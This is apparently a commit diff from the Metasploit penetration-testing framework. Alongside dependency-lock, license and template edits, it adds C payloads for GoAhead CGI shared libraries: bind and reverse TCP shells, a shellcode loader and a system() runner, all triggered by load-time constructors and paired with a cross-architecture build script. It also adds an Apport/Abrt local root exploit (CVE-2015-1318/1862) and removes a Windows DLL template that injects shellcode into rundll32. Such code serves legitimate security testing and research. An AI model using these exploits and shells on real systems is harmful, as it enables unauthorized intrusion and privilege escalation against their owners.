rex-struct2 (0.1.2)
rex-text (0.2.15)
rex-text (0.2.16)
rex-zip (0.1.3)
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
rspec (3.6.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
rspec (3.7.0)
rspec-core (~> 3.7.0)
rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.7.0)
rspec-core (3.7.1)
rspec-support (~> 3.7.0)
rspec-expectations (3.7.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-mocks (3.6.0)
rspec-support (~> 3.7.0)
rspec-mocks (3.7.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-rails (3.6.1)
rspec-support (~> 3.7.0)
rspec-rails (3.7.2)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-core (~> 3.7.0)
rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.7.0)
rspec-support (~> 3.7.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.6.0)
rspec-support (3.7.1)
ruby-macho (1.1.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
bindata
@@ -305,28 +332,32 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
simplecov (0.15.0)
signet (0.8.1)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.15.1)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.3)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2017.2)
tzinfo-data (1.2018.3)
tzinfo (>= 1.0.0)
windows_error (0.1.2)
xdr (2.0.0)
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
yard (0.9.9)
yard (0.9.12)
PLATFORMS
ruby
@@ -334,6 +365,9 @@ PLATFORMS
DEPENDENCIES
factory_girl_rails
fivemat
google-protobuf (= 3.5.1)
grpc (= 1.8.3)
metasploit-aggregator
metasploit-framework!
octokit
pry
@@ -346,4 +380,4 @@ DEPENDENCIES
yard
BUNDLED WITH
1.15.4
1.16.1
-38
View File
@@ -1,38 +0,0 @@
HACKING
=======
(Last updated: 2014-03-04)
This document almost entirely deprecated by:
CONTRIBUTING.md
in the same directory as this file, and to a lesser extent:
The Metasploit Development Environment
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
Common Coding Mistakes
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
The Ruby Style Guide
https://github.com/bbatsov/ruby-style-guide
Ruby 1.9: What to Expect
http://slideshow.rubyforge.org/ruby19.html
You can use the the "./tools/msftidy.rb" script against your new and
changed modules to do some rudimentary checking for various style and
syntax violations.
Licensing for Your New Content
==============================
By submitting code contributions to the Metasploit Project it is
assumed that you are offering your code under the Metasploit License
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
are also fine. We specifically cannot include GPL code. LGPL code
is accepted on a case by case basis for libraries only and is never
accepted for modules.
+10 -1
View File
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: http://www.metasploit.com/
Files: *
Copyright: 2006-2017, Rapid7, Inc.
Copyright: 2006-2018, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,6 +15,11 @@ License: BSD-3-clause
# Last updated: 2013-Nov-04
#
Files: data/exploits/mysql/lib_mysqludf_sys_*.so
Copyright: 2007 Roland Bouman
2008-2010 Roland Bouman and Bernardo Damele A. G.
License: LGPL-2.1
Files: data/templates/to_mem_pshreflection.ps1.template
Copyright: 2012, Matthew Graeber
License: BSD-3-clause
@@ -70,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
Files: lib/msf/core/modules/external/python/async_timeout/*
Copyright: 2016-2017 Andrew Svetlov
License: Apache 2.0
Files: lib/net/dns.rb lib/net/dns/*
Copyright: 2006 Marco Ceresa
License: Ruby
+1 -1
View File
@@ -84,7 +84,7 @@ rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-exploitation, 0.1.15, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
+1 -1
View File
@@ -1,4 +1,4 @@
Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
==
The Metasploit Framework is released under a BSD-style license. See
COPYING for more details.
Binary file not shown.
+48
View File
@@ -0,0 +1,48 @@
#!/bin/bash
build () {
CC=$1
TARGET_SUFFIX=$2
CFLAGS=$3
echo "[*] Building for ${TARGET_SUFFIX}..."
for type in {shellcode,system,reverse,bind}
do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
done
}
rm -f *.o *.so *.gz
#
# Linux GLIBC
#
# x86
build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
# ARM
build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
# MIPS
build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
build "mipsel-linux-gnu-gcc-5" "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
build "mips64-linux-gnuabi64-gcc-5" "linux-glibc-mips64" "-D OLD_LIB_SET_1"
build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
# SPARC
build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
# PowerPC
build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
# S390X
build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
gzip -9 *.so
rm -f *.o *.so
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,96 @@
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
static void _bind_tcp_shell(void) {
int sfd, fd, i;
struct sockaddr_in addr,saddr;
unsigned int saddr_len = sizeof(struct sockaddr_in);
char *lport = "55555";
char *shells[] = {
"/bin/bash",
"/usr/bin/bash",
"/bin/sh",
"/usr/bin/sh",
"/bin/ash",
"/usr/bin/ash",
"/bin/dash",
"/usr/bin/dash",
"/bin/csh",
"/usr/bin/csh",
"/bin/ksh",
"/usr/bin/ksh",
"/bin/busybox",
"/usr/bin/busybox",
NULL
};
sfd = socket(AF_INET, SOCK_STREAM, 0);
setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(atoi(lport));
saddr.sin_addr.s_addr = INADDR_ANY;
bzero(&saddr.sin_zero, 8);
if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
exit(1);
}
if (listen(sfd, 5) == -1) {
close(sfd);
exit(1);
}
fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
close(sfd);
if (fd == -1) {
exit(1);
}
for (i=0; i<3; i++) {
dup2(fd, i);
}
/* Keep trying until execl() succeeds */
for (i=0; ; i++) {
if (shells[i] == NULL) break;
execl(shells[i], "sh", NULL);
}
/* Close the connection if we failed to find a shell */
close(fd);
}
static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
unsetenv("LD_PRELOAD");
if (! fork())
_bind_tcp_shell();
exit(0);
}
@@ -0,0 +1,84 @@
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
static void _reverse_tcp_shell(void) {
int fd, i;
struct sockaddr_in addr;
char *lport = "55555";
char *lhost = "000.000.000.000";
char *shells[] = {
"/bin/bash",
"/usr/bin/bash",
"/bin/sh",
"/usr/bin/sh",
"/bin/ash",
"/usr/bin/ash",
"/bin/dash",
"/usr/bin/dash",
"/bin/csh",
"/usr/bin/csh",
"/bin/ksh",
"/usr/bin/ksh",
"/bin/busybox",
"/usr/bin/busybox",
NULL
};
fd = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(atoi(lport));
addr.sin_addr.s_addr = inet_addr(lhost);
addr.sin_family = AF_INET;
memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
for (i=0; i<10; i++) {
if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
break;
}
}
for (i=0; i<3; i++) {
dup2(fd, i);
}
/* Keep trying until execl() succeeds */
for (i=0; ; i++) {
if (shells[i] == NULL) break;
execl(shells[i], "sh", NULL);
}
/* Close the connection if we failed to find a shell */
close(fd);
}
static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
unsetenv("LD_PRELOAD");
if (! fork())
_reverse_tcp_shell();
exit(0);
}
@@ -0,0 +1,44 @@
#include <stdio.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <signal.h>
#include <stdlib.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver mmap,mmap@GLIBC_2.0");
__asm__(".symver memcpy,memcpy@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver mmap,mmap@GLIBC_2.2.5");
__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
#define PAYLOAD_SIZE 5000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
void *mem;
void (*fn)();
unsetenv("LD_PRELOAD");
mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (mem == MAP_FAILED)
return;
memcpy(mem, payload, PAYLOAD_SIZE);
fn = (void(*)())mem;
if (! fork())
fn();
exit(0);
}
@@ -0,0 +1,32 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
#define PAYLOAD_SIZE 5000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
int dummy = 0;
unsetenv("LD_PRELOAD");
if (! fork())
dummy = system((const char*)payload);
exit(dummy);
}
+21
View File
@@ -0,0 +1,21 @@
#!/bin/bash
# Assume x86_64 Ubuntu 16.04 base system
apt-get install build-essential \
gcc-5-multilib \
gcc-5-multilib-arm-linux-gnueabi \
gcc-5-multilib-arm-linux-gnueabihf \
gcc-5-multilib-mips-linux-gnu \
gcc-5-multilib-mips64-linux-gnuabi64 \
gcc-5-multilib-mips64el-linux-gnuabi64 \
gcc-5-multilib-mipsel-linux-gnu \
gcc-5-multilib-powerpc-linux-gnu \
gcc-5-multilib-powerpc64-linux-gnu \
gcc-5-multilib-s390x-linux-gnu \
gcc-5-multilib-sparc64-linux-gnu \
gcc-4.9-powerpc64le-linux-gnu \
gcc-4.9-aarch64-linux-gnu
if [ ! -e /usr/include/asm ];
then ln -sf /usr/include/asm-generic /usr/include/asm
fi
Binary file not shown.
+143
View File
@@ -0,0 +1,143 @@
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
//
// Modified for Metasploit. Original exploit:
// - https://www.exploit-db.com/exploits/36746/
//
int main(int argc, char **argv)
{
int status;
pid_t wrapper;
pid_t init;
pid_t subprocess;
unsigned i;
// If we're root, then we've convinced the core handler to run us,
// so create a setuid root executable that can be used outside the chroot.
if (getuid() == 0) {
if (chown("sh", 0, 0) != 0)
exit(EXIT_FAILURE);
if (chmod("sh", 04755) != 0)
exit(EXIT_FAILURE);
return EXIT_SUCCESS;
}
// If I'm not root, but euid is 0, then the exploit worked and we can spawn
// a shell and cleanup.
if (setuid(0) == 0) {
system("id");
system("rm -rf exploit");
execlp("sh", "sh", NULL);
// Something went wrong.
err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
}
// It looks like the exploit hasn't run yet, so create a chroot.
if (mkdir("exploit", 0755) != 0
|| mkdir("exploit/usr", 0755) != 0
|| mkdir("exploit/usr/share", 0755) != 0
|| mkdir("exploit/usr/share/apport", 0755) != 0
|| mkdir("exploit/usr/libexec", 0755) != 0) {
err(EXIT_FAILURE, "failed to create chroot directory");
}
// Create links to the exploit locations we need.
if (link(*argv, "exploit/sh") != 0
|| link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu
|| link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora
err(EXIT_FAILURE, "failed to create required hard links");
}
// Create a subprocess so we don't enter the new namespace.
if ((wrapper = fork()) == 0) {
// In the child process, create a new pid and user ns. The pid
// namespace is only needed on Ubuntu, because they check for %P != %p
// in their core handler. On Fedora, just a user ns is sufficient.
if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
err(EXIT_FAILURE, "failed to create new namespace");
// Create a process in the new namespace.
if ((init = fork()) == 0) {
// Init (pid 1) signal handling is special, so make a subprocess to
// handle the traps.
if ((subprocess = fork()) == 0) {
// Change /proc/self/root, which we can do as we're privileged
// within the new namepace.
if (chroot("exploit") != 0) {
err(EXIT_FAILURE, "chroot didnt work");
}
// Now trap to get the core handler invoked.
__builtin_trap();
// Shouldn't happen, unless user is ptracing us or something.
err(EXIT_FAILURE, "coredump failed, were you ptracing?");
}
// If the subprocess exited with an abnormal signal, then everything worked.
if (waitpid(subprocess, &status, 0) == subprocess)
return WIFSIGNALED(status)
? EXIT_SUCCESS
: EXIT_FAILURE;
// Something didn't work.
return EXIT_FAILURE;
}
// The new namespace didn't work.
if (waitpid(init, &status, 0) == init)
return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
? EXIT_SUCCESS
: EXIT_FAILURE;
// Waitpid failure.
return EXIT_FAILURE;
}
// If the subprocess returned sccess, the exploit probably worked,
// reload with euid zero.
if (waitpid(wrapper, &status, 0) == wrapper) {
// All done, spawn root shell.
if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
execl(*argv, "w00t", NULL);
}
}
// Unknown error.
errx(EXIT_FAILURE, "unexpected result, cannot continue");
}
Binary file not shown.
-16
View File
@@ -1,16 +0,0 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o
@@ -1,95 +0,0 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}
@@ -1,3 +0,0 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 MiB

@@ -0,0 +1,6 @@
.cc-window{opacity:1;transition:opacity 1s ease}.cc-window.cc-invisible{opacity:0}.cc-animate.cc-revoke{transition:transform 1s ease}.cc-animate.cc-revoke.cc-top{transform:translateY(-2em)}.cc-animate.cc-revoke.cc-bottom{transform:translateY(2em)}.cc-animate.cc-revoke.cc-active.cc-bottom,.cc-animate.cc-revoke.cc-active.cc-top,.cc-revoke:hover{transform:translateY(0)}.cc-grower{max-height:0;overflow:hidden;transition:max-height 1s}
.cc-link,.cc-revoke:hover{text-decoration:underline}.cc-revoke,.cc-window{position:fixed;overflow:hidden;box-sizing:border-box;font-family:Helvetica,Calibri,Arial,sans-serif;font-size:16px;line-height:1.5em;display:-ms-flexbox;display:flex;-ms-flex-wrap:nowrap;flex-wrap:nowrap;z-index:9999}.cc-window.cc-static{position:static}.cc-window.cc-floating{padding:2em;max-width:24em;-ms-flex-direction:column;flex-direction:column}.cc-window.cc-banner{padding:1em 1.8em;width:100%;-ms-flex-direction:row;flex-direction:row}.cc-revoke{padding:.5em}.cc-header{font-size:18px;font-weight:700}.cc-btn,.cc-close,.cc-link,.cc-revoke{cursor:pointer}.cc-link{opacity:.8;display:inline-block;padding:.2em}.cc-link:hover{opacity:1}.cc-link:active,.cc-link:visited{color:initial}.cc-btn{display:block;padding:.4em .8em;font-size:.9em;font-weight:700;border-width:2px;border-style:solid;text-align:center;white-space:nowrap}.cc-banner .cc-btn:last-child{min-width:140px}.cc-highlight .cc-btn:first-child{background-color:transparent;border-color:transparent}.cc-highlight .cc-btn:first-child:focus,.cc-highlight .cc-btn:first-child:hover{background-color:transparent;text-decoration:underline}.cc-close{display:block;position:absolute;top:.5em;right:.5em;font-size:1.6em;opacity:.9;line-height:.75}.cc-close:focus,.cc-close:hover{opacity:1}
.cc-revoke.cc-top{top:0;left:3em;border-bottom-left-radius:.5em;border-bottom-right-radius:.5em}.cc-revoke.cc-bottom{bottom:0;left:3em;border-top-left-radius:.5em;border-top-right-radius:.5em}.cc-revoke.cc-left{left:3em;right:unset}.cc-revoke.cc-right{right:3em;left:unset}.cc-top{top:1em}.cc-left{left:1em}.cc-right{right:1em}.cc-bottom{bottom:1em}.cc-floating>.cc-link{margin-bottom:1em}.cc-floating .cc-message{display:block;margin-bottom:1em}.cc-window.cc-floating .cc-compliance{-ms-flex:1;flex:1}.cc-window.cc-banner{-ms-flex-align:center;align-items:center}.cc-banner.cc-top{left:0;right:0;top:0}.cc-banner.cc-bottom{left:0;right:0;bottom:0}.cc-banner .cc-message{-ms-flex:1;flex:1}.cc-compliance{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-line-pack:justify;align-content:space-between}.cc-compliance>.cc-btn{-ms-flex:1;flex:1}.cc-btn+.cc-btn{margin-left:.5em}
@media print{.cc-revoke,.cc-window{display:none}}@media screen and (max-width:900px){.cc-btn{white-space:normal}}@media screen and (max-width:414px) and (orientation:portrait),screen and (max-width:736px) and (orientation:landscape){.cc-window.cc-top{top:0}.cc-window.cc-bottom{bottom:0}.cc-window.cc-banner,.cc-window.cc-left,.cc-window.cc-right{left:0;right:0}.cc-window.cc-banner{-ms-flex-direction:column;flex-direction:column}.cc-window.cc-banner .cc-compliance{-ms-flex:1;flex:1}.cc-window.cc-floating{max-width:none}.cc-window .cc-message{margin-bottom:1em}.cc-window.cc-banner{-ms-flex-align:unset;align-items:unset}}
.cc-floating.cc-theme-classic{padding:1.2em;border-radius:5px}.cc-floating.cc-type-info.cc-theme-classic .cc-compliance{text-align:center;display:inline;-ms-flex:none;flex:none}.cc-theme-classic .cc-btn{border-radius:5px}.cc-theme-classic .cc-btn:last-child{min-width:140px}.cc-floating.cc-type-info.cc-theme-classic .cc-btn{display:inline-block}
.cc-theme-edgeless.cc-window{padding:0}.cc-floating.cc-theme-edgeless .cc-message{margin:2em 2em 1.5em}.cc-banner.cc-theme-edgeless .cc-btn{margin:0;padding:.8em 1.8em;height:100%}.cc-banner.cc-theme-edgeless .cc-message{margin-left:1em}.cc-floating.cc-theme-edgeless .cc-btn+.cc-btn{margin-left:0}
File diff suppressed because one or more lines are too long
+1 -1
View File
@@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+2 -4
View File
@@ -1,11 +1,9 @@
## <%= items[:mod_name] %>
<p>
<%= normalize_description(items[:mod_description]) %>
</p>
## Module Name
<%= Rex::Text.html_encode(items[:mod_fullname]) %>
<%= CGI::escapeHTML(items[:mod_fullname]) %>
## Authors
@@ -47,4 +45,4 @@ No options required.
## Basic Usage
<%= normalize_demo_output(items[:mod_demo]) %>
<%= normalize_demo_output(items[:mod_demo]) %>
+1 -1
View File
@@ -65,4 +65,4 @@
</div>
<% end %>
</body>
</html>
</html>
BIN
View File
Binary file not shown.
Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More